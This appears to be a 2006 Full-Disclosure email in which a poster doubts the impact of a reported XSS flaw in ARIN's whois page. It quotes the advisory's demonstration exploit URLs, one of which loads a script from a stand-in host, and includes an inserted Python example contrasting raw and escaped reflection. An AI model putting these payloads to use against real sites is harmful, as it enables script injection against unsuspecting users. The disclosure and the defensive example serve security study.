<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML dir=ltr><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2900.2802" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>ok?</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>So what exactly are you going to exploit
here? This site doesn't have any logins or even use cookies. Are you
going to trick a user into entering a credit card number before they can
search the whois database?</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>I think that XSS in many instances is a serious
issue. Many of the XSS issues reported on FD are rarely of much
consequence but could theoretically lead to a session hijack or tricking the
user into a fake login screen. However, in this instance I fail to see
what the point could possibly be. If it is that you can simply run
javascript then so what? Close to 100% of webhosting providers on the
internet will let you upload your own javascript. Might as well report
that geocities.com is vulnerable to XSS because you could upload an html file
with javascript on it.</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>Anyway.. that's my take on this. Feel free to
correct me.. I don't mind.</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>Steven</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
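<DIV><FONT face=Arial size=2>Added example (not from either poster, and not ARIN's code): a hypothetical model of a whois page that reflects the queryinput parameter raw, beside one that HTML-escapes it, checked against the first demonstration URL from the advisory quoted below. PAGE, render_vulnerable, render_hardened and the helper functions are names assumed here.</FONT></DIV>

```python
import html
from urllib.parse import parse_qs, urlsplit

# Hypothetical model of a whois search page that reflects the "queryinput"
# parameter into its HTML (written for this thread; not ARIN's code).
# The parameter lands in two contexts: an attribute value and element text.
PAGE = ('<html><body><form>Search: '
        '<input name="queryinput" value="{q}"></form>'
        '<p>Results for {q}</p></body></html>')

# First demonstration URL from the quoted advisory.
SAMPLE_URL = ("http://ws.arin.net/whois/?queryinput="
              "%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E")


def queryinput_from_url(url: str) -> str:
    """Percent-decode the queryinput parameter the way a server framework would."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("queryinput", [""])[0]


def render_vulnerable(queryinput: str) -> str:
    """Reflects the raw value: any markup in it becomes part of the page."""
    return PAGE.format(q=queryinput)


def render_hardened(queryinput: str) -> str:
    """HTML-escapes the value (quotes included, for the attribute context)
    before reflection, so the browser treats it as text rather than markup."""
    return PAGE.format(q=html.escape(queryinput, quote=True))


def reflected_unescaped(page_html: str, queryinput: str) -> bool:
    """True if a value containing HTML metacharacters appears verbatim in the
    page, i.e. the page reflects it without encoding."""
    return any(c in queryinput for c in '<>"\'&') and queryinput in page_html


if __name__ == "__main__":
    q = queryinput_from_url(SAMPLE_URL)
    print("decoded parameter:", q)
    print("vulnerable page reflects markup:", reflected_unescaped(render_vulnerable(q), q))
    print("hardened page reflects markup:  ", reflected_unescaped(render_hardened(q), q))
```

Whether the reflected script can reach anything of value on the site is a separate question from whether the page reflects it; the escaping fix applies either way.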
<DIV>----- Original Message ----- </DIV>
<BLOCKQUOTE
style="PADDING-RIGHT: 0px; PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px">
<DIV
style="BACKGROUND: #e4e4e4; FONT: 10pt arial; font-color: black"><B>From:</B>
<A title=Security@peadro.net href="mailto:Security@peadro.net">Terminal
Entry</A> </DIV>
<DIV style="FONT: 10pt arial"><B>To:</B> <A
title=full-disclosure@lists.grok.org.uk
href="mailto:full-disclosure@lists.grok.org.uk">Full Disclosure</A> ; <A
title=bugtraq@securityfocus.com href="mailto:bugtraq@securityfocus.com">Bug
Traq</A> </DIV>
<DIV style="FONT: 10pt arial"><B>Sent:</B> Thursday, March 02, 2006 11:17
PM</DIV>
<DIV style="FONT: 10pt arial"><B>Subject:</B> [Full-disclosure] Arin.net XSS
</DIV>
<DIV><BR></DIV>
<DIV><FONT face=Arial color=#000000 size=2><STRONG>Title</STRONG></FONT></DIV>
<DIV><FONT face=Arial color=#000000><FONT size=2><FONT face=Arial>ARIN.NET
input validation holes in "?queryinput=" allow remote users to conduct
cross-site scripting attacks</FONT><BR></FONT></FONT></DIV>
<DIV><FONT face=Arial color=#000000><FONT
size=2><STRONG>Notification</STRONG><BR>Multiple attempts to contact Arin site
administrators went unanswered</FONT></FONT></DIV>
<DIV><FONT face=Arial color=#000000 size=2></FONT> </DIV>
<DIV><FONT size=2><FONT face=Arial><STRONG>Exploit
Included:</STRONG> Yes</FONT></FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2><STRONG>Description</STRONG></FONT></DIV>
<DIV><FONT face=Arial color=#000000 size=2><FONT face=Arial size=2>The
"?queryinput=" script does not properly validate user-supplied input in
several parameters to filter HTML code. A remote user can create a specially
crafted URL that, when loaded by a target user, will cause arbitrary scripting
code to be executed by the target user's browser. </FONT><BR></FONT></DIV>
<DIV><FONT face=Arial color=#000000 size=2><FONT face=Arial size=2>Some
demonstration exploit URLs are provided:</FONT></FONT></DIV>
<DIV><FONT face=Arial color=#000000 size=2><A
href="http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E"
target=_blank>http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</A><BR><A
href="http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E"
target=_blank>http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E</A><BR><A
href="http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E"
target=_blank>http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</A></FONT></DIV>
<DIV><FONT face=Arial color=#000000 size=2><BR>Discovered by Terminal Entry
security [.at.] peadro (.)net<BR><BR></FONT></DIV>
<P>
<HR>
<P></P>_______________________________________________<BR>Full-Disclosure - We
believe in it.<BR>Charter:
http://lists.grok.org.uk/full-disclosure-charter.html<BR>Hosted and sponsored
by Secunia - http://secunia.com/</BLOCKQUOTE></BODY></HTML>